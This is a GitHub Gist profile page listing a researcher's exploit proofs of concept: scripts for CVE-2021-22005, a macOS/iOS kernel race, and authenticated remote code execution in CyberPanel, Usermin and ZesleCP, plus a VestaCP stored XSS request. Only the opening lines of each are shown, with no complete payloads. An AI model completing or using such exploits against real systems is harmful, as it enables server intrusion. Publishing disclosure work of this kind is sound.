Skip to content

Instantly share code, notes, and snippets.

Avatar
🌑

numan türle numanturle

🌑
View GitHub Profile
View CVE-2021-22005.py
import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
View 0day.php
<?php
function anim($msg, $time)
{
$msg = str_split($msg);
foreach ($msg as $ms) {
echo $ms;
usleep($time);
}
}
anim("
@numanturle
numanturle / poc.c
Created Sep 16, 2021 — forked from infernalheaven/poc.c
macOS 11.5.2/iOS 14.7.1 Kernel Race Condition poc
View poc.c
/*
Written By Pan ZhenPeng(@peterpan980927) of Alibaba Security Pandora Lab
use it on macOS: cc poc.c -o poc while True; do ./poc ; done
*/
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
@numanturle
numanturle / CyberPanel - Authenticated Remote Code Execution - 1.md
Created Mar 7, 2021
CyberPanel - Authenticated Remote Code Execution - 1
View CyberPanel - Authenticated Remote Code Execution - 1.md

HTTP REQUEST

POST /websites/addNewCron HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 137
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0
@numanturle
numanturle / cyberpanel.py
Created Aug 27, 2021
CyberPanel - Remote Code Execution (Authenticated) ( Version 2.1 )
View cyberpanel.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# CyberPanel - Remote Code Execution (Authenticated) ( Version 2.1 )
# author: twitter.com/numanturle
# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE]
# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password
import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
@numanturle
numanturle / usermin.py
Created Aug 27, 2021
Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
View usermin.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
# author: twitter.com/numanturle
# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://youtu.be/wiRIWFAhz24
import argparse,requests,warnings,json,re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
@numanturle
numanturle / zeslecp.py
Created Aug 27, 2021
ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
View zeslecp.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )
# author: twitter.com/numanturle
# usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://www.youtube.com/watch?v=5lTDTEBVq-0
import argparse,requests,warnings,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning
View CyberPanel - Authenticated Remote Code Execution - 2.md
POST /filemanager/controller HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 141
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0 
Content-Type: application/json;charset=UTF-8
View CyberPanel - Authenticated Remote Code Execution - 3.md
POST /filemanager/controller HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 175
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0 
Content-Type: application/json;charset=UTF-8
View VestaCP_Stored_Xss.md
POST /add/ip/ HTTP/1.1
Host: 89.252.140.31:8083
Connection: close
Content-Length: 165
Cache-Control: max-age=0
Origin: https://89.252.140.31:8083
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded